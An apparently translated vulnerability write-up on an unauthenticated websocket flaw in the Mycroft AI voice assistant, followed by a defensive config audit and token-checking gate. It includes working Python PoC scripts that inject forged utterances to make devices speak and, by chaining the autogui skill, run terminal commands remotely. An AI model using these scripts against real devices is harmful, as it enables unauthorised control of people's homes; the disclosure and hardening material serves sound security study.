2025-02-23 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article is about how to analyze the remote code execution vulnerability in Mycroft AI. The editor considers it very practical and shares it here for study; I hope you gain something from reading it.
While contributing to open source packaging in the Arch Linux community, I came across a very interesting project: Mycroft AI, an open source voice assistant application based on artificial intelligence (AI). While studying it, I found a remote code execution (RCE) vulnerability that can be exploited without any user interaction.
Unlike the well-known Amazon Echo and Google Home, Mycroft first launched crowdfunding on overseas websites in 2015 to mass-produce its Mark-I and Mark-II generation products, and in March its Mark-II generation products sold out four days after launch. The Mycroft AI intelligent voice assistant, based on Linux desktop/server and Raspberry Pi architectures, is widely used in smart home automation systems, and a customized version is planned for some Jaguar and Land Rover models.
Code analysis
While analyzing the Mycroft AI source code, I found an interesting piece of code:
    # Excerpt from the Mycroft messagebus service (Tornado-based websocket server)
    from tornado import web, ioloop

    host = config.get("host")
    port = config.get("port")
    route = config.get("route")
    validate_param(host, "websocket.host")
    validate_param(port, "websocket.port")
    validate_param(route, "websocket.route")

    # One route, handled by WebsocketEventHandler; no authentication layer in between
    routes = [(route, WebsocketEventHandler)]
    application = web.Application(routes, **settings)
    application.listen(port, host)
    ioloop.IOLoop.instance().start()
Here it defines a websocket server that receives instructions from remote clients such as the Android app; the websocket server settings are defined in mycroft.conf:
    // The mycroft-core messagebus' websocket
    "websocket": {
        "host": "0.0.0.0",
        "port": 8181,
        "route": "/core",
        "ssl": false
    }
From the above configuration we can see that the websocket server listens on 0.0.0.0:8181/core by default and requires no authentication at all. OK, let's write a script to test it:
    #!/usr/bin/env python
    import asyncio
    import json
    import websockets

    uri = "ws://myserver:8181/core"
    command = "say pwned"

    async def sendPayload():
        # A message on the Mycroft bus is a JSON envelope of type/data/context;
        # "recognizer_loop:utterance" is what the speech recognizer would normally emit
        message = {
            "type": "recognizer_loop:utterance",
            "data": {"utterances": [command]},
            "context": None,
        }
        async with websockets.connect(uri) as websocket:
            await websocket.send(json.dumps(message))

    asyncio.get_event_loop().run_until_complete(sendPayload())
So we can make Mycroft AI say "pwned" by itself; in other words, we can make a Mycroft AI device speak remotely. That is not a big discovery though; at best it is a way to scare a friend.
Mycroft AI's skill system
Digging deeper, you find that Mycroft has a built-in skills system through which you can install other voice skills you want, which sounds good, doesn't it?
So what are the elements of a Mycroft skill? According to the documentation, a skill consists of the following:
dialog/en-us/command.dialog: contains the voice commands that trigger the skill
vocab/en-us/answer.voc: contains Mycroft's spoken answer
requirements.txt: contains the packages the skill needs, installed with pip
__init__.py: contains the skill's main function and the commands that must be loaded to trigger execution
Utilization analysis
With the above skill elements, I can create a malicious skill that, when triggered, executes arbitrary code on the remote Mycroft device. Unfortunately, this cannot be done through voice commands alone, unless the skill's URL is one that the online skill sources will accept. That is possible, but somewhat troublesome to implement.
Test implementation
Mycroft ships with many default skills, such as the open skill, which can launch other third-party applications, and there are also skills that are whitelisted but not installed on Mycroft devices by default. On further research I found an interesting skill called skill-autogui, whose main function is to control the mouse and keyboard. All right, let's try it! Combining all of the above findings into a single PoC:
    #!/usr/bin/env python
    import sys
    import asyncio
    import json
    import websockets

    # First mute the audio so the device does not announce each step, then the user-supplied utterances
    cmds = ["mute audio"] + sys.argv[1:]
    uri = "ws://myserver:8181/core"

    async def sendPayload():
        for payload in cmds:
            message = {
                "type": "recognizer_loop:utterance",
                "data": {"utterances": [payload]},
                "context": None,
            }
            async with websockets.connect(uri) as websocket:
                await websocket.send(json.dumps(message))
            # Give the skill time to act before the next utterance arrives
            await asyncio.sleep(1)

    asyncio.get_event_loop().run_until_complete(sendPayload())
Running the exploit as pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" executes the command on the Linux system of the remote Mycroft device:
Notes:
open xterm: because my test Linux system is a desktop, the command on the remote test machine is also executed directly through a terminal (TTY).
At present the Mycroft skills repository has undergone major changes, and some skills, including autogui, are temporarily unavailable, but that is not the point. Many Mycroft skills interact with smart home automation systems, so other services may be controllable and abusable in the same way. The core of this vulnerability is that the websocket server lacks the necessary authentication.
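The two weaknesses this article identifies are the bus binding to 0.0.0.0 without TLS and the handler accepting any envelope from any client. The following is an added example written for this article, not Mycroft's own code: a small configuration audit for the "websocket" section shown above, plus a hypothetical gate that a bus handler could run before dispatching a message, requiring a shared bearer token and validating the type/data/context envelope that the PoC scripts send. The config dicts, the token, and the MessagebusGate class are all constructed here for illustration.

```python
import hmac
import json
import secrets

# Constructed samples in the shape of mycroft.conf's "websocket" section:
# the default as described in the article, and a hardened variant.
OPEN_CONFIG = {"host": "0.0.0.0", "port": 8181, "route": "/core", "ssl": False}
HARDENED_CONFIG = {"host": "127.0.0.1", "port": 8181, "route": "/core", "ssl": True}


def audit_websocket_config(cfg):
    """Return a list of findings for a messagebus websocket config dict."""
    findings = []
    if cfg.get("host") in ("0.0.0.0", "::", ""):
        findings.append("bus listens on all interfaces; bind to 127.0.0.1 or firewall the port")
    if not cfg.get("ssl", False):
        findings.append("TLS disabled; utterances and responses travel in cleartext")
    return findings


def utterance_message(text):
    """Build the same envelope the article's scripts send to the bus."""
    return json.dumps({
        "type": "recognizer_loop:utterance",
        "data": {"utterances": [text]},
        "context": None,
    })


class MessagebusGate:
    """Hypothetical pre-dispatch check for a bus websocket handler: the client
    must present a shared token, and the message must be a well-formed envelope."""

    def __init__(self, token):
        self._token = token.encode()
        self.rejected = []  # (reason, raw) pairs, useful as a local audit trail

    def authorize(self, headers):
        presented = headers.get("Authorization", "")
        if not presented.startswith("Bearer "):
            return False
        # Constant-time comparison so token guessing gains nothing from timing
        return hmac.compare_digest(presented[len("Bearer "):].encode(), self._token)

    def parse_message(self, raw):
        """Validate the {"type", "data", "context"} envelope; raise ValueError otherwise."""
        try:
            msg = json.loads(raw)
        except json.JSONDecodeError as exc:
            raise ValueError(f"invalid JSON: {exc}") from None
        if not isinstance(msg, dict) or not isinstance(msg.get("type"), str):
            raise ValueError("missing string 'type'")
        data = msg.get("data", {})
        if not isinstance(data, dict):
            raise ValueError("'data' must be an object")
        if msg["type"] == "recognizer_loop:utterance":
            utts = data.get("utterances")
            if not isinstance(utts, list) or not all(isinstance(u, str) for u in utts):
                raise ValueError("utterances must be a list of strings")
        return msg

    def handle(self, headers, raw):
        """Return ("accept", message type) or ("reject", reason)."""
        if not self.authorize(headers):
            self.rejected.append(("unauthenticated client", raw))
            return ("reject", "unauthenticated client")
        try:
            msg = self.parse_message(raw)
        except ValueError as exc:
            self.rejected.append((str(exc), raw))
            return ("reject", str(exc))
        return ("accept", msg["type"])


if __name__ == "__main__":
    for name, cfg in (("default", OPEN_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_websocket_config(cfg) or ["ok"])
    token = secrets.token_hex(16)
    gate = MessagebusGate(token)
    env = utterance_message("say pwned")
    print(gate.handle({}, env))                                   # rejected: no token
    print(gate.handle({"Authorization": f"Bearer {token}"}, env))  # accepted
```

The audit reproduces the article's observation mechanically (wide-open bind, no TLS), and the gate shows the missing piece: even with the port exposed, an unauthenticated client's utterance never reaches the skill dispatcher, and each rejection is recorded so an operator can notice probing of the bus.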
Affected devices
All devices running Mycroft whose websocket server is exposed to the network (the websocket interface of Mark-I generation devices sits behind a firewall by default).
That is how to analyze the remote code execution vulnerability in Mycroft AI. The editor believes it contains knowledge points that we may encounter or use in daily work; I hope you learned something from this article. For more details, please follow the industry information channel.